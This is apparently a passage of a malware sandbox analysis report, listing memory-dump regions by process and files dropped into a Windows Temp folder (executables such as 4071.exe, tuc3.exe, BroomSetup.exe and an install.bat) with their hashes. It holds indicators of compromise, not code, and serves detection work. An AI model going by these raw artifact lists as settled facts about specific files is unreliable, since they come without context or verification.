memory/1832-34-0x0000000006620000-0x000000000665C000-memory.dmp

memory/1832-35-0x00000000080C0000-0x000000000810C000-memory.dmp

memory/1832-36-0x0000000008C50000-0x0000000008CB6000-memory.dmp

memory/1832-37-0x0000000009090000-0x00000000090E0000-memory.dmp

memory/1608-38-0x0000000006840000-0x0000000006A08000-memory.dmp

memory/1608-39-0x0000000007C40000-0x0000000007DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/1608-45-0x0000000005FA0000-0x0000000005FB0000-memory.dmp

memory/1608-46-0x0000000005D00000-0x0000000005D10000-memory.dmp

memory/1608-47-0x0000000005D00000-0x0000000005D10000-memory.dmp

memory/1608-48-0x0000000005D00000-0x0000000005D10000-memory.dmp

memory/1608-50-0x0000000005D00000-0x0000000005D10000-memory.dmp

memory/1608-49-0x0000000005D00000-0x0000000005D10000-memory.dmp

memory/1608-52-0x00000000083A0000-0x00000000084A0000-memory.dmp

memory/1608-53-0x00000000083A0000-0x00000000084A0000-memory.dmp

memory/1608-51-0x0000000005D00000-0x0000000005D10000-memory.dmp

memory/1608-55-0x00000000083A0000-0x00000000084A0000-memory.dmp

memory/1356-54-0x0000000000400000-0x000000000043C000-memory.dmp

memory/1832-58-0x00000000094B0000-0x0000000009672000-memory.dmp

memory/1832-57-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1356-59-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1832-60-0x0000000009BB0000-0x000000000A0DC000-memory.dmp

memory/1832-62-0x0000000005110000-0x0000000005120000-memory.dmp

memory/1608-63-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1356-64-0x0000000004E90000-0x0000000004EA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4071.exe

MD5 54226b2db6b4ef852164ef8b69426a6c
SHA1 a1c36dd7cfedbfe86c07fe260d71eefa2d591afc
SHA256 b2d8928ba610dbfd4f652c6899ab552251629af0d210fa43efc7b04f5471f1c2
SHA512 f8a51ec93b04d0454b5123195c58b880ef79b242171d3694393ec982feb257b7d7644a92cbe854b37fc7265f0f3868fe1d05619f109866fa13272339c7c28aab

C:\Users\Admin\AppData\Local\Temp\4071.exe

MD5 4b86d5128a5ae0104c07fdc960a220c1
SHA1 1a18a3ea1ff82f450f5987cd542de472ee47e8e9
SHA256 7c95d92c932dc5f68fce72bc91bd10af80e20b7a0f99c1fdecd303694ca62c05
SHA512 4c7818627141f1593ccc7f9735e0511b3ed8b5bc359e2cbf34b151c32d19ec277e81c61cae84d38596a87bec12e18e7c89ac981b557b94b4cdd3706d35c1f7a7

memory/1504-68-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1504-69-0x0000000000D00000-0x0000000001AF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 fd3967790f9b00f107ad32b2918330a0
SHA1 da44a0403f61da1946c9f6a8aac8a7b5fb4a393b
SHA256 0c3a6022d16181647d51aa0a3a940887598afeeb0f6b2bba8eb4eaccd6c78a38
SHA512 b0db15140dc3e0e83acbfa671dd8708ff9309b54e58446b73ae109853f118df47fbd8d7e82ab3e84ace4743501bed6e8dc001f2890c1e5f98cdb0cefbeed5f3a

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 c6c53c63657293e4da62c4e7f1d1831b
SHA1 a8379d445fb2226da97418f4d75bad07ef9290ca
SHA256 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf
SHA512 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965

C:\Users\Admin\AppData\Local\Temp\4CB7.exe

MD5 dc6fbf2cd9ad1f1f0ac200e9bec7ea3f
SHA1 c3af9d82d270829784339331dea63f927400e0d4
SHA256 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590
SHA512 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat

MD5 60c9624e093baac4bef11ab4fc846111
SHA1 07a25911c81e04608a0dc6fb065524a9da82dd65
SHA256 e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d
SHA512 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 ba3c9a8bb110eab47d50289bb5b2649e
SHA1 712ac41a981c905d2e196e09de6c5b07aecf817d
SHA256 e75c74dea2242ec3ef269f3c1ecbb11e3596e8aa7f3f6f0103f6764248403729
SHA512 59712293eb0c55a1988bfc64668e7552a0ec128da9361cb5665c936cb754ae9d1fe55f4a33a395ee7dcf205988fb0e0f17b00007b1283aa92c25895aa061efcf

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 92fd3981a506dfbb1693fc0b7408178f
SHA1 36ac4436c87a418f4d4a1ec0ef894bcfa9c9fffd
SHA256 8993a7cc631b326a6f4f0c7b69ea7ecb59a3687ae3ee458a3dab21f680cdb756
SHA512 94a08867275ea41a610acfb8a62c6521b4b498e42100f3d2083229658939bf00a5136cfa6dc47d090dbd82756411dc47374cbe23c6204062120bb1c15e299704

C:\Users\Admin\AppData\Local\Temp\nsd589C.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 cbac498919a9c98b2eb0275337292117
SHA1 cc922e05683632b1545d46413fc16f1987e83272
SHA256 869874cb38b537f1f78c300726923208fa9dfd4ebbd2e34aa43c6c784bf63e51
SHA512 7b0c353ebe187b5891b15a2baeb1a3a7dfc2b5ef1bcb00124a57b1b8d90859e40e40e80c71a6636b85069b4cfd43d144e453cdae22babb891b09a0da138de4c4

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 f13a7efa3ff667b3c48772966ad11f90
SHA1 b764e17683fbb95de8f93d030b7372f3276f76b8
SHA256 2f83ad42a1f0f0f360423e24029a29a58a4289d016e32cc28cc186ec9abb764e
SHA512 7def7d78d7421ace9c04e718faeca1a520fb3cc34b4b072477a9d354a606a69c74fc3681ca44fbed6e5184e1aeec4e8094d3684ad8fde0a696698c85266b1250

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 442d527f5a1fbb69048d287300832509
SHA1 595d5a1496c5ee16b0a86a81908394d342515fb5
SHA256 dfdf8791420306ac13e642edf65f09cbbc70817a6f8532cd056bc24068100c79
SHA512 6e95912897814692ad234e52f8beafe150af22648cd68d7ca933cfe8411e83aa50f4643f7bb4f4fe415df3b422bfd942120b16a527d723c4f12159116b8684ad

C:\Users\Admin\AppData\Local\Temp\nsd589C.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

memory/1704-126-0x0000000000990000-0x0000000000999000-memory.dmp

memory/1504-130-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1132-132-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1132-128-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4372-127-0x0000000000400000-0x0000000000418000-memory.dmp

memory/1704-125-0x0000000000A00000-0x0000000000B00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 134a8d26b1a4d45ddc81bf78dad8bfc8
SHA1 7494cdcaedf79868d5c60e1d27de594f00ca6afe
SHA256 1d105f8ea1def43bbdd9b146f871312b8d7e07c8a04d7f8762da3f4d347e0f48
SHA512 7ced5f5513b6a7f5d685f604378ee4e725903dc62a5f3149ae92140acd7aeaa4fdf57491a54d400054449e63fe754f7649a7dc9e9cb080c9a87300ac523bc22b

C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp

MD5 f448d7f4b76e5c9c3a4eaff16a8b9b73
SHA1 31808f1ffa84c954376975b7cdb0007e6b762488
SHA256 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49
SHA512 f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 cebb587a4ae00a76e325a152c72d4e75
SHA1 ecd669d5cbb36bdc1603c874389affd575568a8e
SHA256 0051ece33b859b57790852bd73ebdeee32af04e3ebe024bf32e2209893f3134b
SHA512 cb9ad2d2fc416ef85f10a36401c1a1a31d71ca7a73e4385326f9f6a5ff7acc0a646b819b242b46b24f006597872e1f1b8d9305e4005b105d2889f42e4fde009e

C:\Users\Admin\AppData\Local\Temp\is-IQN02.tmp\_isetup\_isdecmp.dll

MD5 3adaa386b671c2df3bae5b39dc093008
SHA1 067cf95fbdb922d81db58432c46930f86d23dded
SHA256 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38
SHA512 bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303

C:\Users\Admin\AppData\Local\Temp\is-IQN02.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/1032-152-0x00007FFD8D690000-0x00007FFD8E151000-memory.dmp

memory/1032-153-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp

memory/1032-154-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp

memory/1872-155-0x0000000002200000-0x0000000002201000-memory.dmp

memory/1032-157-0x0000027C4F730000-0x0000027C4F752000-memory.dmp

memory/1936-166-0x0000000000B40000-0x0000000000B41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wa0cdmpw.nvb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4292-167-0x0000000002980000-0x0000000002D84000-memory.dmp

memory/4292-168-0x0000000002E90000-0x000000000377B000-memory.dmp

memory/1032-169-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp

memory/4292-170-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/3552-171-0x0000000002940000-0x0000000002956000-memory.dmp

memory/1132-172-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1356-234-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1832-239-0x0000000005110000-0x0000000005120000-memory.dmp